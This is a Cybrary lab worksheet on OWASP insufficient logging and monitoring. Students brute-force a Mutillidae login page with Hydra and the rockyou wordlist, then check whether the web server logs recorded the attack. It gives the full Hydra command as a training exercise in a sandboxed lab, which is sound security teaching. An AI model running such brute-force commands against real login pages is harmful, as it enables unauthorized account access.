Sie sind auf Seite 1von 2

 

 
 

 
Module 11 Insufficient Logging and Monitoring Lab

Description: In this lab, you will determine if sufficient logging is taking place on the Web
server. We will first run a password attack against the login page and then review the log
files to determine if there is sufficient logging and monitoring in place.
Requirements:​ You will need access to the Cybrary lab environment for this lab.

Step 1:​ Log into Cybrary


Step 2:​ Launch the ​OWASP Insufficient Logging & Monitoring​ lab by searching for it in
the catalog and selecting the launch button
Note: It may take 30-40 seconds for the lab to launch after clicking the button.

Step 3:​ When the lab opens, you will see a pop-up box. Select the Next button, then Ok to
close the pop-up box.
Step 4:​ You will then be taken to the Kali Linux log in screen.
Step 5:​ Enter a username of ​student ​and a password of ​student ​to log into the desktop.
Step 6:​ Next, open a Terminal by clicking the black box on the left-side of the screen.
Step 7:​ At the Terminal prompt, type the following and press Enter. cat login.txt
Note: This shows us parameters for login requests.

Step 8:​ Now, we will brute force the login page with a tool called Hydra.
Step 9:​ Enter the following and press Enter.
hydra -f -l admin -P /usr/share/wordlists/rockyou.txt mutillidae http-post-form
“/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&l
ogin-php-submit-button=Login:Password incorrect”

Note: It may take 1 or 2 minutes to perform the attack.

Question 1:​ Do you see any passwords? ____________________________________

 
Brought to you by:  Develop your team with the ​fastest growing catalog​ in the 
cybersecurity industry. Enterprise-grade workforce development 
management, advanced training features and detailed skill gap and 
 
competency analytics. 

 
 
 
 

 
Step 10:​ Next, launch Firefox by clicking on the orange-colored icon on the left-side menu.
Step 11:​ Next, click the ​View Log​ option at the top-right of the page.

Question 2:​ Do you see any log information that shows the password attack we just performed with
Hydra? ________________________________________________

Step 12:​ Keep looking at the log information.

Question 3:​ What else do you see? ______________________________________

Question 4:​ Do you think there is sufficient monitoring going on?


___________________________________________________________________

 
Brought to you by:  Develop your team with the ​fastest growing catalog​ in the 
cybersecurity industry. Enterprise-grade workforce development 
management, advanced training features and detailed skill gap and 
 
competency analytics. 

Das könnte Ihnen auch gefallen